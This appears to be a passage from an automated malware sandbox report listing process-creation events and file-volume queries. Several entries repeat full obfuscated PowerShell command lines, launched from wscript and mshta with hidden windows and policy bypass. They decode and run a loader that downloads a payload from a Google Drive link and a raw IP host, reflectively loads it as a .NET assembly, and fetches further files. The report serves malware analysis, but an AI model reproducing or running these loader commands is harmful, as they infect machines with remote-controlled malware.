rtdhjpbmcod1zvymfzzty0umv2zxjzzwqpo3dwvwxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szscrj2zszwn0aw9ulkfzc2vtymx5xto6tg9hzch3vlvjb21tyw5kqicrj3l0zxmpo3dwvxzhjysnau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qou3fwvkfju3fwktt3vlv2ywlnzxrob2qusw52bycrj2tlkccrj3dwvw51bgwsieaou3fwdhh0lljtu0dsue1tlziync81nteuodcxljy0ljgnkyc5ms8vonankyd0dghtcxasifnxcgrlc2f0axzhzg9tcxasifnxcgrlc2f0axzhzg9tjysncxasifnxcgqnkydlc2f0axzhzg9tcxasjysnifnxcenhc1bvbfnxccwgu3fwzgvzyxrpdmfkb1nxccwgu3fwzgvzyxrpdmfkb1nxccxtcscrj3bkzxnhdgl2ywrvu3enkydwlfnxcgrlc2f0axzhzg9tcxasu3fwzgvzyscrj3rpdmfkb1nxccxtcxbkzxnhdgl2ywrvu3fwlfnxcgrlc2f0axzhzg9tcxasu3fwmvnxccxtcxbkzxnhdgl2ywrvu3fwksk7jykucmvwbgfdzsgow2noyvjdmta2k1tjagfsxtg2k1tjagfsxtg0kswnfccplnjlcgxhq2uokftjagfsxtgzk1tjagfsxtexmytby2hhul0xmtiplfttdhjjbkddw2noyvjdmzkplnjlcgxhq2uoj3dwvscsw1n0cklur11by2hhul0znikgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".((get-variable '*mdr*').name[3,11,2]-join'') (('wvuimageurl = sqphttps://drive.google.com/uc?export=dow'+'nload&id=1aivgjjjv1f6vs4suoybnh-sdvu'+'hbywur '+'sqp;wvuwebclient = new-object system.net.webclient;wvuimagebytes = '+'wvuwebclient.downloaddata'+'(wvuimageurl);wvuimage'+'text = [system.text.encoding]::ut'+'f8'+'.getstring(wvuimagebytes);wvustartflag = sqp<<base64_start>>sqp;wvuendflag = sqp<<base64_end>>sqp;wvustartind'+'ex = wvuimage'+'text.indexof(wvustartfl'+'ag);wvuen'+'dindex = wvuimagetext.inde'+'xof(wvuendflag);wvustartindex -ge 0 -'+'and wvuendindex '+'-gt wvustartindex;wvustartindex '+'+= wvustartflag.length;wvubase'+'64length = wvuendindex - wvustartindex;wvubase64co'+'mmand = wvuimagetext.substring(wvustartindex'+', wvubase'+'64length);wvubase64reversed = -join (wvubase64command.tochararray() jvt'+' foreach-object { wvu_ })[-1..-(wvubase64c'+'ommand.length)];wvucomma'+'ndbytes = [sy'+'stem.convert]::frombase64string(wvubase64reversed);wvuloadedassembly = [system.re'+'flection.assembly]::load(wvucommandb'+'ytes);wvuva'+'imethod = [dnlib.io.home].ge'+'tmethod(sqpvaisqp);wvuvaimethod.invo'+'ke('+'wvunull, @(sqptxt.rssgrpms/224/551.871.64.8'+'91//:p'+'tthsqp, sqpdesativadosqp, sqpdesativados'+'qp, sqpd'+'esativadosqp,'+' sqpcaspolsqp, sqpdesativadosqp, sqpdesativadosqp,sq'+'pdesativadosq'+'p,sqpdesativadosqp,sqpdesa'+'tivadosqp,sqpdesativadosqp,sqpdesativadosqp,sqp1sqp,sqpdesativadosqp));').replace(([char]106+[char]86+[char]84),'|').replace(([char]83+[char]113+[char]112),[string][char]39).replace('wvu',[string][char]36) )"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jet2icagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagieferc10wvbficagicagicagicagicagicagicagicagicagicaglu1fbujfckrfrkloavrpb24gicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9olkrstcisicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagie5ieg0sc3ryaw5nicagicagicagicagicagicagicagicagicagicagtg1ba1bebmvhlhn0cmluzyagicagicagicagicagicagicagicagicagicagigjmbllkyix1aw50icagicagicagicagicagicagicagicagicagicagennxu0fxleludfb0ciagicagicagicagicagicagicagicagicagicagiefyryk7jyagicagicagicagicagicagicagicagicagicagic1oyu1ficagicagicagicagicagicagicagicagicagicagimtuwgxfd0tybndriiagicagicagicagicagicagicagicagicagicagic1uyw1fu3bhq0ugicagicagicagicagicagicagicagicagicagicbivvz4icagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicrldjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5oc40ni4xnzgumtu1lzqymi9zzwv0agvizxn0dghpbmdzd2l0agdvb2r0agluz3nmb3jnzxrtzwjhy2t3axroymvzdhroaw5ncy50suyilcikzu5wokfquerbvefcc2vldghlymvzdhroaw5nc3dpdghnb29kdghpbmdzzm9yz2v0bwviywnrlnziuyismcwwkttzdefydc1ztgvfucgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcc2vldghlymvzdhroaw5nc3dpdghnb29kdghpbmdzzm9yz2v0bwviywnrlnziuyi='+[char]0x22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'ligor2vulvzhcmlhymxficcqturskicplm5bbuvbmywxmswyxs1kt2lojycpicgoj3dwvwltywdlvxjsid0gu3fwahr0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3cnkydubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlunkydoqll3dxigjysnu3fwo3dwvxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7d1zvaw1hz2vcexrlcya9iccrj3dwvxdlyknsawvudc5eb3dubg9hzerhdgenkycod1zvaw1hz2vvcmwpo3dwvwltywdljysnvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvujysnrjgnkycur2v0u3ryaw5nkhdwvwltywdlqnl0zxmpo3dwvxn0yxj0rmxhzya9ifnxcdw8qkftrty0x1nuqvjupj5tcxa7d1zvzw5krmxhzya9ifnxcdw8qkftrty0x0vord4+u3fwo3dwvxn0yxj0sw5kjysnzxggpsb3vlvpbwfnzscrj1rlehqusw5kzxhpzih3vlvzdgfydezsjysnywcpo3dwvwvujysnzeluzgv4id0gd1zvaw1hz2vuzxh0lkluzgunkyd4t2yod1zvzw5krmxhzyk7d1zvc3rhcnrjbmrlecatz2ugmcatjysnyw5kihdwvwvuzeluzgv4iccrjy1ndcb3vlvzdgfydeluzgv4o3dwvxn0yxj0sw5kzxggjysnkz0gd1zvc3rhcnrgbgfnlkxlbmd0adt3vlviyxnljysnnjrmzw5ndgggpsb3vlvlbmrjbmrlecatihdwvxn0yxj0sw5kzxg7d1zvymfzzty0q28nkydtbwfuzca9ihdwvwltywdlvgv4dc5tdwjzdhjpbmcod1zvc3rhcnrjbmrleccrjywgd1zvymfzzscrjzy0tgvuz3roktt3vlviyxnlnjrszxzlcnnlzca9ic1qb2luich3vlviyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgalzujysniezvckvhy2gtt2jqzwn0ihsgd1zvxyb9kvstms4ulsh3vlviyxnlnjrdjysnb21tyw5klkxlbmd0acldo3dwvwnvbw1hjysnbmrcexrlcya9ifttescrj3n0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcod1zvymfzzty0umv2zxjzzwqpo3dwvwxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szscrj2zszwn0aw9ulkfzc2vtymx5xto6tg9hzch3vlvjb21tyw5kqicrj3l0zxmpo3dwvxzhjysnau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qou3fwvkfju3fwktt3vlv2ywlnzxrob2qusw52bycrj2tlkccrj3dwvw51bgwsieaou3fwdhh0lljtu0dsue1tlziync81nteuodcxljy0ljgnkyc5ms8vonankyd0dghtcxasifnxcgrlc2f0axzhzg9tcxasifnxcgrlc2f0axzhzg9tjysncxasifnxcgqnkydlc2f0axzhzg9tcxasjysnifnxcenhc1bvbfnxccwgu3fwzgvzyxrpdmfkb1nxccwgu3fwzgvzyxrpdmfkb1nxccxtcscrj3bkzxnhdgl2ywrvu3enkydwlfnxcgrlc2f0axzhzg9tcxasu3fwzgvzyscrj3rpdmfkb1nxccxtcxbkzxnhdgl2ywrvu3fwlfnxcgrlc2f0axzhzg9tcxasu3fwmvnxccxtcxbkzxnhdgl2ywrvu3fwksk7jykucmvwbgfdzsgow2noyvjdmta2k1tjagfsxtg2k1tjagfsxtg0kswnfccplnjlcgxhq2uokftjagfsxtgzk1tjagfsxtexmytby2hhul0xmtiplfttdhjjbkddw2noyvjdmzkplnjlcgxhq2uoj3dwvscsw1n0cklur11by2hhul0znikgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".((get-variable '*mdr*').name[3,11,2]-join'') (('wvuimageurl = sqphttps://drive.google.com/uc?export=dow'+'nload&id=1aivgjjjv1f6vs4suoybnh-sdvu'+'hbywur '+'sqp;wvuwebclient = new-object system.net.webclient;wvuimagebytes = '+'wvuwebclient.downloaddata'+'(wvuimageurl);wvuimage'+'text = [system.text.encoding]::ut'+'f8'+'.getstring(wvuimagebytes);wvustartflag = sqp<<base64_start>>sqp;wvuendflag = sqp<<base64_end>>sqp;wvustartind'+'ex = wvuimage'+'text.indexof(wvustartfl'+'ag);wvuen'+'dindex = wvuimagetext.inde'+'xof(wvuendflag);wvustartindex -ge 0 -'+'and wvuendindex '+'-gt wvustartindex;wvustartindex '+'+= wvustartflag.length;wvubase'+'64length = wvuendindex - wvustartindex;wvubase64co'+'mmand = wvuimagetext.substring(wvustartindex'+', wvubase'+'64length);wvubase64reversed = -join (wvubase64command.tochararray() jvt'+' foreach-object { wvu_ })[-1..-(wvubase64c'+'ommand.length)];wvucomma'+'ndbytes = [sy'+'stem.convert]::frombase64string(wvubase64reversed);wvuloadedassembly = [system.re'+'flection.assembly]::load(wvucommandb'+'ytes);wvuva'+'imethod = [dnlib.io.home].ge'+'tmethod(sqpvaisqp);wvuvaimethod.invo'+'ke('+'wvunull, @(sqptxt.rssgrpms/224/551.871.64.8'+'91//:p'+'tthsqp, sqpdesativadosqp, sqpdesativados'+'qp, sqpd'+'esativadosqp,'+' sqpcaspolsqp, sqpdesativadosqp, sqpdesativadosqp,sq'+'pdesativadosq'+'p,sqpdesativadosqp,sqpdesa'+'tivadosqp,sqpdesativadosqp,sqpdesativadosqp,sqp1sqp,sqpdesativadosqp));').replace(([char]106+[char]86+[char]84),'|').replace(([char]83+[char]113+[char]112),[string][char]39).replace('wvu',[string][char]36) )"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jet2icagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagieferc10wvbficagicagicagicagicagicagicagicagicagicaglu1fbujfckrfrkloavrpb24gicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9olkrstcisicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagie5ieg0sc3ryaw5nicagicagicagicagicagicagicagicagicagicagtg1ba1bebmvhlhn0cmluzyagicagicagicagicagicagicagicagicagicagigjmbllkyix1aw50icagicagicagicagicagicagicagicagicagicagennxu0fxleludfb0ciagicagicagicagicagicagicagicagicagicagiefyryk7jyagicagicagicagicagicagicagicagicagicagic1oyu1ficagicagicagicagicagicagicagicagicagicagimtuwgxfd0tybndriiagicagicagicagicagicagicagicagicagicagic1uyw1fu3bhq0ugicagicagicagicagicagicagicagicagicagicbivvz4icagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicrldjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5oc40ni4xnzgumtu1lzqymi9zzwv0agvizxn0dghpbmdzd2l0agdvb2r0agluz3nmb3jnzxrtzwjhy2t3axroymvzdhroaw5ncy50suyilcikzu5wokfquerbvefcc2vldghlymvzdhroaw5nc3dpdghnb29kdghpbmdzzm9yz2v0bwviywnrlnziuyismcwwkttzdefydc1ztgvfucgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcc2vldghlymvzdhroaw5nc3dpdghnb29kdghpbmdzzm9yz2v0bwviywnrlnziuyi='+[char]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'ligor2vulvzhcmlhymxficcqturskicplm5bbuvbmywxmswyxs1kt2lojycpicgoj3dwvwltywdlvxjsid0gu3fwahr0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3cnkydubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlunkydoqll3dxigjysnu3fwo3dwvxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7d1zvaw1hz2vcexrlcya9iccrj3dwvxdlyknsawvudc5eb3dubg9hzerhdgenkycod1zvaw1hz2vvcmwpo3dwvwltywdljysnvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvujysnrjgnkycur2v0u3ryaw5nkhdwvwltywdlqnl0zxmpo3dwvxn0yxj0rmxhzya9ifnxcdw8qkftrty0x1nuqvjupj5tcxa7d1zvzw5krmxhzya9ifnxcdw8qkftrty0x0vord4+u3fwo3dwvxn0yxj0sw5kjysnzxggpsb3vlvpbwfnzscrj1rlehqusw5kzxhpzih3vlvzdgfydezsjysnywcpo3dwvwvujysnzeluzgv4id0gd1zvaw1hz2vuzxh0lkluzgunkyd4t2yod1zvzw5krmxhzyk7d1zvc3rhcnrjbmrlecatz2ugmcatjysnyw5kihdwvwvuzeluzgv4iccrjy1ndcb3vlvzdgfydeluzgv4o3dwvxn0yxj0sw5kzxggjysnkz0gd1zvc3rhcnrgbgfnlkxlbmd0adt3vlviyxnljysnnjrmzw5ndgggpsb3vlvlbmrjbmrlecatihdwvxn0yxj0sw5kzxg7d1zvymfzzty0q28nkydtbwfuzca9ihdwvwltywdlvgv4dc5tdwjzdhjpbmcod1zvc3rhcnrjbmrleccrjywgd1zvymfzzscrjzy0tgvuz3roktt3vlviyxnlnjrszxzlcnnlzca9ic1qb2luich3vlviyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgalzujysniezvckvhy2gtt2jqzwn0ihsgd1zvxyb9kvstms4ulsh3vlviyxnlnjrdjysnb21tyw5klkxlbmd0acldo3dwvwnvbw1hjysnbmrcexrlcya9ifttescrj3n0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcod1zvymfzzty0umv2zxjzzwqpo3dwvwxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szscrj2zszwn0aw9ulkfzc2vtymx5xto6tg9hzch3vlvjb21tyw5kqicrj3l0zxmpo3dwvxzhjysnau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qou3fwvkfju3fwktt3vlv2ywlnzxrob2qusw52bycrj2tlkccrj3dwvw51bgwsieaou3fwdhh0lljtu0dsue1tlziync81nteuodcxljy0ljgnkyc5ms8vonankyd0dghtcxasifnxcgrlc2f0axzhzg9tcxasifnxcgrlc2f0axzhzg9tjysncxasifnxcgqnkydlc2f0axzhzg9tcxasjysnifnxcenhc1bvbfnxccwgu3fwzgvzyxrpdmfkb1nxccwgu3fwzgvzyxrpdmfkb1nxccxtcscrj3bkzxnhdgl2ywrvu3enkydwlfnxcgrlc2f0axzhzg9tcxasu3fwzgvzyscrj3rpdmfkb1nxccxtcxbkzxnhdgl2ywrvu3fwlfnxcgrlc2f0axzhzg9tcxasu3fwmvnxccxtcxbkzxnhdgl2ywrvu3fwksk7jykucmvwbgfdzsgow2noyvjdmta2k1tjagfsxtg2k1tjagfsxtg0kswnfccplnjlcgxhq2uokftjagfsxtgzk1tjagfsxtexmytby2hhul0xmtiplfttdhjjbkddw2noyvjdmzkplnjlcgxhq2uoj3dwvscsw1n0cklur11by2hhul0znikgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".((get-variable '*mdr*').name[3,11,2]-join'') (('wvuimageurl = sqphttps://drive.google.com/uc?export=dow'+'nload&id=1aivgjjjv1f6vs4suoybnh-sdvu'+'hbywur '+'sqp;wvuwebclient = new-object system.net.webclient;wvuimagebytes = '+'wvuwebclient.downloaddata'+'(wvuimageurl);wvuimage'+'text = [system.text.encoding]::ut'+'f8'+'.getstring(wvuimagebytes);wvustartflag = sqp<<base64_start>>sqp;wvuendflag = sqp<<base64_end>>sqp;wvustartind'+'ex = wvuimage'+'text.indexof(wvustartfl'+'ag);wvuen'+'dindex = wvuimagetext.inde'+'xof(wvuendflag);wvustartindex -ge 0 -'+'and wvuendindex '+'-gt wvustartindex;wvustartindex '+'+= wvustartflag.length;wvubase'+'64length = wvuendindex - wvustartindex;wvubase64co'+'mmand = wvuimagetext.substring(wvustartindex'+', wvubase'+'64length);wvubase64reversed = -join (wvubase64command.tochararray() jvt'+' foreach-object { wvu_ })[-1..-(wvubase64c'+'ommand.length)];wvucomma'+'ndbytes = [sy'+'stem.convert]::frombase64string(wvubase64reversed);wvuloadedassembly = [system.re'+'flection.assembly]::load(wvucommandb'+'ytes);wvuva'+'imethod = [dnlib.io.home].ge'+'tmethod(sqpvaisqp);wvuvaimethod.invo'+'ke('+'wvunull, @(sqptxt.rssgrpms/224/551.871.64.8'+'91//:p'+'tthsqp, sqpdesativadosqp, sqpdesativados'+'qp, sqpd'+'esativadosqp,'+' sqpcaspolsqp, sqpdesativadosqp, sqpdesativadosqp,sq'+'pdesativadosq'+'p,sqpdesativadosqp,sqpdesa'+'tivadosqp,sqpdesativadosqp,sqpdesativadosqp,sqp1sqp,sqpdesativadosqp));').replace(([char]106+[char]86+[char]84),'|').replace(([char]83+[char]113+[char]112),[string][char]39).replace('wvu',[string][char]36) )"Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jet2icagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagieferc10wvbficagicagicagicagicagicagicagicagicagicaglu1fbujfckrfrkloavrpb24gicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9olkrstcisicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagie5ieg0sc3ryaw5nicagicagicagicagicagicagicagicagicagicagtg1ba1bebmvhlhn0cmluzyagicagicagicagicagicagicagicagicagicagigjmbllkyix1aw50icagicagicagicagicagicagicagicagicagicagennxu0fxleludfb0ciagicagicagicagicagicagicagicagicagicagiefyryk7jyagicagicagicagicagicagicagicagicagicagic1oyu1ficagicagicagicagicagicagicagicagicagicagimtuwgxfd0tybndriiagicagicagicagicagicagicagicagicagicagic1uyw1fu3bhq0ugicagicagicagicagicagicagicagicagicagicbivvz4icagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicrldjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5oc40ni4xnzgumtu1lzqymi9zzwv0agvizxn0dghpbmdzd2l0agdvb2r0agluz3nmb3jnzxrtzwjhy2t3axroymvzdhroaw5ncy50suyilcikzu5wokfquerbvefcc2vldghlymvzdhroaw5nc3dpdghnb29kdghpbmdzzm9yz2v0bwviywnrlnziuyismcwwkttzdefydc1ztgvfucgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcc2vldghlymvzdhroaw5nc3dpdghnb29kdghpbmdzzm9yz2v0bwviywnrlnziuyi='+[char]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'ligor2vulvzhcmlhymxficcqturskicplm5bbuvbmywxmswyxs1kt2lojycpicgoj3dwvwltywdlvxjsid0gu3fwahr0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3cnkydubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlunkydoqll3dxigjysnu3fwo3dwvxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7d1zvaw1hz2vcexrlcya9iccrj3dwvxdlyknsawvudc5eb3dubg9hzerhdgenkycod1zvaw1hz2vvcmwpo3dwvwltywdljysnvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvujysnrjgnkycur2v0u3ryaw5nkhdwvwltywdlqnl0zxmpo3dwvxn0yxj0rmxhzya9ifnxcdw8qkftrty0x1nuqvjupj5tcxa7d1zvzw5krmxhzya9ifnxcdw8qkftrty0x0vord4+u3fwo3dwvxn0yxj0sw5kjysnzxggpsb3vlvpbwfnzscrj1rlehqusw5kzxhpzih3vlvzdgfydezsjysnywcpo3dwvwvujysnzeluzgv4id0gd1zvaw1hz2vuzxh0lkluzgunkyd4t2yod1zvzw5krmxhzyk7d1zvc3rhcnrjbmrlecatz2ugmcatjysnyw5kihdwvwvuzeluzgv4iccrjy1ndcb3vlvzdgfydeluzgv4o3dwvxn0yxj0sw5kzxggjysnkz0gd1zvc3rhcnrgbgfnlkxlbmd0adt3vlviyxnljysnnjrmzw5ndgggpsb3vlvlbmrjbmrlecatihdwvxn0yxj0sw5kzxg7d1zvymfzzty0q28nkydtbwfuzca9ihdwvwltywdlvgv4dc5tdwjzdhjpbmcod1zvc3rhcnrjbmrleccrjywgd1zvymfzzscrjzy0tgvuz3roktt3vlviyxnlnjrszxzlcnnlzca9ic1qb2luich3vlviyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgalzujysniezvckvhy2gtt2jqzwn0ihsgd1zvxyb9kvstms4ulsh3vlviyxnlnjrdjysnb21tyw5klkxlbmd0acldo3dwvwnvbw1hjysnbmrcexrlcya9ifttescrj3n0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcod1zvymfzzty0umv2zxjzzwqpo3dwvwxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szscrj2zszwn0aw9ulkfzc2vtymx5xto6tg9hzch3vlvjb21tyw5kqicrj3l0zxmpo3dwvxzhjysnau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qou3fwvkfju3fwktt3vlv2ywlnzxrob2qusw52bycrj2tlkccrj3dwvw51bgwsieaou3fwdhh0lljtu0dsue1tlziync81nteuodcxljy0ljgnkyc5ms8vonankyd0dghtcxasifnxcgrlc2f0axzhzg9tcxasifnxcgrlc2f0axzhzg9tjysncxasifnxcgqnkydlc2f0axzhzg9tcxasjysnifnxcenhc1bvbfnxccwgu3fwzgvzyxrpdmfkb1nxccwgu3fwzgvzyxrpdmfkb1nxccxtcscrj3bkzxnhdgl2ywrvu3enkydwlfnxcgrlc2f0axzhzg9tcxasu3fwzgvzyscrj3rpdmfkb1nxccxtcxbkzxnhdgl2ywrvu3fwlfnxcgrlc2f0axzhzg9tcxasu3fwmvnxccxtcxbkzxnhdgl2ywrvu3fwksk7jykucmvwbgfdzsgow2noyvjdmta2k1tjagfsxtg2k1tjagfsxtg0kswnfccplnjlcgxhq2uokftjagfsxtgzk1tjagfsxtexmytby2hhul0xmtiplfttdhjjbkddw2noyvjdmzkplnjlcgxhq2uoj3dwvscsw1n0cklur11by2hhul0znikgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".((get-variable '*mdr*').name[3,11,2]-join'') (('wvuimageurl = sqphttps://drive.google.com/uc?export=dow'+'nload&id=1aivgjjjv1f6vs4suoybnh-sdvu'+'hbywur '+'sqp;wvuwebclient = new-object system.net.webclient;wvuimagebytes = '+'wvuwebclient.downloaddata'+'(wvuimageurl);wvuimage'+'text = [system.text.encoding]::ut'+'f8'+'.getstring(wvuimagebytes);wvustartflag = sqp<<base64_start>>sqp;wvuendflag = sqp<<base64_end>>sqp;wvustartind'+'ex = wvuimage'+'text.indexof(wvustartfl'+'ag);wvuen'+'dindex = wvuimagetext.inde'+'xof(wvuendflag);wvustartindex -ge 0 -'+'and wvuendindex '+'-gt wvustartindex;wvustartindex '+'+= wvustartflag.length;wvubase'+'64length = wvuendindex - wvustartindex;wvubase64co'+'mmand = wvuimagetext.substring(wvustartindex'+', wvubase'+'64length);wvubase64reversed = -join (wvubase64command.tochararray() jvt'+' foreach-object { wvu_ })[-1..-(wvubase64c'+'ommand.length)];wvucomma'+'ndbytes = [sy'+'stem.convert]::frombase64string(wvubase64reversed);wvuloadedassembly = [system.re'+'flection.assembly]::load(wvucommandb'+'ytes);wvuva'+'imethod = [dnlib.io.home].ge'+'tmethod(sqpvaisqp);wvuvaimethod.invo'+'ke('+'wvunull, @(sqptxt.rssgrpms/224/551.871.64.8'+'91//:p'+'tthsqp, sqpdesativadosqp, sqpdesativados'+'qp, sqpd'+'esativadosqp,'+' sqpcaspolsqp, sqpdesativadosqp, sqpdesativadosqp,sq'+'pdesativadosq'+'p,sqpdesativadosqp,sqpdesa'+'tivadosqp,sqpdesativadosqp,sqpdesativadosqp,sqp1sqp,sqpdesativadosqp));').replace(([char]106+[char]86+[char]84),'|').replace(([char]83+[char]113+[char]112),[string][char]39).replace('wvu',[string][char]36) )"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
